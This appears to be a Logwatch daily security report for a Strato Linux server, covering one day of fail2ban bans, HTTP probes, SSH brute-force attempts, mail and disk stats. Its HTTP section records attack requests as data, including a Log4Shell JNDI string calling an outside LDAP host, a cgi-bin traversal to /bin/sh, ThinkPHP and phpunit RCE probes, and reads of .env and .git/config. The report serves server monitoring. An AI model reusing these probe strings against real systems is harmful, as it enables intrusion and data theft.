[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

Dienstag, 28 Dezember 2021


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Tue Dec 28 04:42:04 2021
        Date Range Processed: yesterday
                              ( 2021-Dec-27 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [ 28:28 ]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 A total of 9 sites probed the server 
    119.28.114.205
    172.104.131.24
    183.136.225.42
    185.200.117.167
    2.58.149.40
    20.102.62.146
    205.185.124.100
    222.186.19.235
    66.240.205.34
 
 Requests with error response codes
    400 Bad Request
       null: 21 Time(s)
       1.1: 4 Time(s)
       /: 3 Time(s)
       /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
       /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... VMjgVRwttl6AAAC: 2 Time(s)
       http://fuwu.sogou.com/404/index.html: 2 Time(s)
       &\x0E\xD6>\x16\x86@\x89\xA4DE\x98\x8A\x11\ ... C\x00<\x00/\x00: 1
Time(s)
       /.env: 1 Time(s)
       /0bef: 1 Time(s)
       /manager/html: 1 Time(s)
       4~: 1 Time(s)
       5,5\x82\xC6\x5CT\xD1\x0B\xD2gH\xB11A\xB2\x ... BA\xD7\xBA\xB2N: 1 Time(s)
       55\xC5\x18\x97d\x10xe\xD7Zux\xDBDw&\x10\xF ... x09\xC0\x13\xC0: 1 Time(s)
       @\xFE7\xA7:/\xAC\x1E@\x9E3e\x13\xCD\xC9\xE ... C0\xAE\xC0+\xC0: 1 Time(s)
       E\xEA\xBB\xB5\x1E;\xC3\xDA\x8F\xCD\xAC: 1 Time(s)
       G\xD2\xC9e\x98/\xB9\xB9\x19\xB9\x1F\xFF/\x ... x09\xC0\x13\xC0: 1 Time(s)
       R\xCF0\xEB\xDD\x08M\x85\x8D\xFE\x03\x10\xD ... C\x00<\x00/\x00: 1 Time(s)
       \x01Zx\x87\xA0\xF1UR: 1 Time(s)
       \x1B\x17\x95f\x7F\x86\xFB\x88\x86\x5C\xDC( ... C0$\x13\x05\xC0: 1 Time(s)
       \x98\x18\x16\xF9\xB0\x13\xBE\xE5w5'4\x9D\x ... x09\xC0\x13\xC0: 1 Time(s)
       \x98\xC4P\xF9B\xB0R\xCC\xDD\x9B\xA8\xF8\xF ... x13\xC0\x11\x00: 1 Time(s)
       \x9C\xCC\x9B\x88\xE6\xCB\x1D\x1B(\xEC\xDCN ... C\x00<\x00/\x00: 1 Time(s)
       \xA0\x97b\x97\x9F\x96\x83\x1E\x05\x05`\x1C ... x09\xC0\x13\xC0: 1 Time(s)
       \xA1\x9C\xA9w\xF0\x86!\x81I\xA6\x15$\x94\x ... A5c\xB0\xAA\xD9: 1 Time(s)
       \xAD\xCA\xBC.\x9C\xE4\xB1\xF3\xA3\xB7d(\x0 ... C0\xAE\xC0+\xC0: 1 Time(s)
       \xB2t\xC4Z\x9E\x9F\xB5\xBF\xE1\xC5Z\xD9\xD ... w\xE3f\x0C\xE6&: 1 Time(s)
       \xD5\x1D: 1 Time(s)
       \xE3\xF4\x1B\xB2\xE1\x8E_W: 1 Time(s)
       \xE4\xF6\x98\xA2\xDA\x7Fx\xCF\xA8\xCB!\x12\x09{\xB2\xC3: 1 Time(s)
       \xF3B: 1 Time(s)
       \xF3\xB6%\x94D*\x8E\xB6\x83X;\xB3\xFF\x90\ ... 0\xDC\xD6/\xDCx: 1 Time(s)
       \xF4\xD4\x97\xD5\xC4\xF7\xA9\x89o-].\xE1\x ... x09\xC0\x13\xC0: 1 Time(s)
       \xF9\xB0$P\xD96~\xA6\xC8\xA2\x1C\xE5\x046j ... C0$\x13\x05\xC0: 1 Time(s)
       a[`/5\xD8: 1 Time(s)
       iM\x5C\xD6\x8Ah\xD3<\x89\x183\xBD\x03\xAE\ ... C0\xAE\xC0+\xC0: 1 Time(s)
       j\xDC\x01\xE9\x9D\x8D\xB0u\xFB\xCEf\x129S\ ... C0\xAE\xC0+\xC0: 1 Time(s)
       n9z\xC2Y]\xDEqmX\x11Hc\x88\xB5\xC1\xC8W1\x ... C0\xAE\xC0+\xC0: 1 Time(s)
       |NK\x81\xA6|!\xAD`%\xC3\x8C\x9D/\x90\xC2Y& ... C0\xAE\xC0+\xC0: 1 Time(s)
    404 Not Found
       //2019/wp-includes/wlwmanifest.xml: 2 Time(s)
       //blog/wp-includes/wlwmanifest.xml: 2 Time(s)
       //cms/wp-includes/wlwmanifest.xml: 2 Time(s)
       //news/wp-includes/wlwmanifest.xml: 2 Time(s)
       //shop/wp-includes/wlwmanifest.xml: 2 Time(s)
       //site/wp-includes/wlwmanifest.xml: 2 Time(s)
       //sito/wp-includes/wlwmanifest.xml: 2 Time(s)
       //test/wp-includes/wlwmanifest.xml: 2 Time(s)
       //web/wp-includes/wlwmanifest.xml: 2 Time(s)
       //website/wp-includes/wlwmanifest.xml: 2 Time(s)
       //wordpress/wp-includes/wlwmanifest.xml: 2 Time(s)
       //wp-includes/wlwmanifest.xml: 2 Time(s)
       //wp/wp-includes/wlwmanifest.xml: 2 Time(s)
       //wp1/wp-includes/wlwmanifest.xml: 2 Time(s)
       //wp2/wp-includes/wlwmanifest.xml: 2 Time(s)
       //xmlrpc.php?rsd: 2 Time(s)
       //2018/wp-includes/wlwmanifest.xml: 1 Time(s)
       //2020/wp-includes/wlwmanifest.xml: 1 Time(s)
       //media/wp-includes/wlwmanifest.xml: 1 Time(s)
    500 Internal Server Error
       /.env: 21 Time(s)
       /: 17 Time(s)
       /console/: 2 Time(s)
       /mifs/.;/services/LogService: 2 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
       /.git/config: 1 Time(s)
       /?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
       /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
       /Autodiscover/Autodiscover.xml: 1 Time(s)
       /HNAP1: 1 Time(s)
       /_ignition/execute-solution: 1 Time(s)
       /actuator/health: 1 Time(s)
       /dns-query?dns=AeYBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE: 1 Time(s)
       /dns-query?dns=nKYBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE: 1 Time(s)
       /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
       /evox/about: 1 Time(s)
       /favicon.ico: 1 Time(s)
       /index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
       /level/15/exec/-/sh/run/CR: 1 Time(s)
       /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
       /sdk: 1 Time(s)
       /text4041640632818: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       unknown (snf-22770.ok-kno.grnetcloud.net): 41 Time(s)
       root (net-2-45-185-2.cust.vodafonedsl.it): 32 Time(s)
       root (165.22.120.146): 30 Time(s)
       unknown (net-2-45-185-2.cust.vodafonedsl.it): 18 Time(s)
       unknown (165.22.120.146): 17 Time(s)
       root (211.45.247.122): 16 Time(s)
       root (222.185.231.246): 16 Time(s)
       root (125.46.81.106): 12 Time(s)
       root (106.51.80.198): 9 Time(s)
       root (210.22.128.214): 9 Time(s)
       root (snf-22770.ok-kno.grnetcloud.net): 9 Time(s)
       unknown (211.45.247.122): 9 Time(s)
       root (104.244.77.235): 6 Time(s)
       root (104.244.78.168): 6 Time(s)
       root (185.220.101.152): 6 Time(s)
       root (199.195.248.80): 6 Time(s)
       root (81.17.18.58): 6 Time(s)
       root (bras-base-plvlpq3500w-grc-02-70-49-126-223.dsl.bell.ca): 6 Time(s)
       root (chelseamanning.tor-exit.calyxinstitute.org): 6 Time(s)
       root (mariellefranco.tor-exit.calyxinstitute.org): 6 Time(s)
       root (84.123.27.171.dyn.user.ono.com): 5 Time(s)
       root (ua-85-229-243-210.bbcust.telenor.se): 5 Time(s)
       unknown (210.22.128.214): 5 Time(s)
       root (113.119.180.153): 4 Time(s)
       unknown (111.93.214.67): 4 Time(s)
       root (103.235.170.195): 3 Time(s)
       root (212.64.75.189): 3 Time(s)
       root (93-42-117-137.ip86.fastwebnet.it): 3 Time(s)
       unknown (125.46.81.106): 3 Time(s)
       unknown (212.64.75.189): 3 Time(s)
       unknown (222.185.231.246): 3 Time(s)
       root (111.93.214.67): 2 Time(s)
       root (203.245.29.159): 2 Time(s)
       unknown (106.51.80.198): 2 Time(s)
       unknown (130.180.77.106): 2 Time(s)
       unknown (host-79-37-231-134.retail.telecomitalia.it): 2 Time(s)
       root (121.134.173.39): 1 Time(s)
       root (165.232.92.225): 1 Time(s)
       root (165.232.92.241): 1 Time(s)
       root (222.186.153.230): 1 Time(s)
       root (5.2.69.50): 1 Time(s)
       root (5.2.72.124): 1 Time(s)
       unknown (113.119.180.153): 1 Time(s)
       unknown (121.134.173.39): 1 Time(s)
       unknown (141.98.11.16): 1 Time(s)
       unknown (58.246.251.27): 1 Time(s)
       unknown (84.123.27.171.dyn.user.ono.com): 1 Time(s)
       unknown (93-42-117-137.ip86.fastwebnet.it): 1 Time(s)
       unknown (tor-bridge-nur.linkspartei.org): 1 Time(s)
       unknown (ua-85-229-243-210.bbcust.telenor.se): 1 Time(s)
    Invalid Users:
       Unknown Account: 117 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

    9.286K  Bytes accepted                               9,509
    9.286K  Bytes sent via SMTP                          9,509
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
        3   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
        3   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
      173   Connections             
        5   Connections lost (inbound) 
      173   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
        3   Hostname verification errors (FCRDNS) 
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Disconnecting after too many authentication failures for user:
    root : 8 Time(s)
 
 Failed logins from:
    2.45.185.2 (net-2-45-185-2.cust.vodafonedsl.it): 32 times
    5.2.69.50: 5 times
    5.2.72.124: 3 times
    70.49.126.223 (bras-base-plvlpq3500w-grc-02-70-49-126-223.dsl.bell.ca): 6 times
    81.17.18.58 (block1-che.interlayer.co.uk): 6 times
    83.212.79.250: 9 times
    84.123.27.171 (84.123.27.171.dyn.user.ono.com): 5 times
    85.229.243.210 (ua-85-229-243-210.bbcust.telenor.se): 5 times
    93.42.117.137 (93-42-117-137.ip86.fastwebnet.it): 3 times
    103.235.170.195: 3 times
    104.244.77.235 (LuxembourgTor15.lu): 6 times
    104.244.78.168 (LuxembourgTor47.lu): 6 times
    106.51.80.198 (106.51.80.198.actcorp.in): 9 times
    111.93.214.67 (static-67.214.93.111-tataidc.co.in): 2 times
    113.119.180.153: 4 times
    121.134.173.39: 1 time
    125.46.81.106 (hn.kd.ny.adsl): 12 times
    165.22.120.146: 30 times
    165.232.92.225: 1 time
    165.232.92.241: 1 time
    185.220.101.152 (tor-exit-152.relayon.org): 6 times
    185.220.103.5 (chelseamanning.tor-exit.calyxinstitute.org): 6 times
    185.220.103.8 (mariellefranco.tor-exit.calyxinstitute.org): 6 times
    199.195.248.80 (NewYorkTor11.us): 6 times
    203.245.29.159: 2 times
    210.22.128.214: 9 times
    211.45.247.122: 16 times
    212.64.75.189: 3 times
    222.185.231.246: 16 times
    222.186.153.230: 1 time
 
 Illegal users from:
    2001:470:1:332::2 (the-shadow-server-foundation.e0-1.core1.sfo2.he.net): 1 time
    undef: 103 times
    2.45.185.2 (net-2-45-185-2.cust.vodafonedsl.it): 18 times
    58.246.251.27: 1 time
    64.62.197.152: 1 time
    79.37.231.134 (host-79-37-231-134.retail.telecomitalia.it): 2 times
    83.212.79.250: 41 times
    84.123.27.171 (84.123.27.171.dyn.user.ono.com): 1 time
    85.229.243.210 (ua-85-229-243-210.bbcust.telenor.se): 1 time
    93.42.117.137 (93-42-117-137.ip86.fastwebnet.it): 1 time
    106.51.80.198 (106.51.80.198.actcorp.in): 2 times
    111.93.214.67 (static-67.214.93.111-tataidc.co.in): 4 times
    113.119.180.153: 1 time
    121.134.173.39: 1 time
    125.46.81.106 (hn.kd.ny.adsl): 3 times
    130.180.77.106 (ex01.the-hadleys.de): 2 times
    141.98.11.16: 1 time
    152.89.107.127 (tor-bridge-nur.linkspartei.org): 1 time
    165.22.120.146: 17 times
    210.22.128.214: 5 times
    211.45.247.122: 9 times
    212.64.75.189: 3 times
    222.185.231.246: 3 times
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem         Size  Used Avail Use% Mounted on
 /dev/ploop33257p1  394G  242G  132G  65% /
 none               4.0G     0  4.0G   0% /dev
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

[TOPF] Logwatch for h2361197.stratoserver.net (Linux)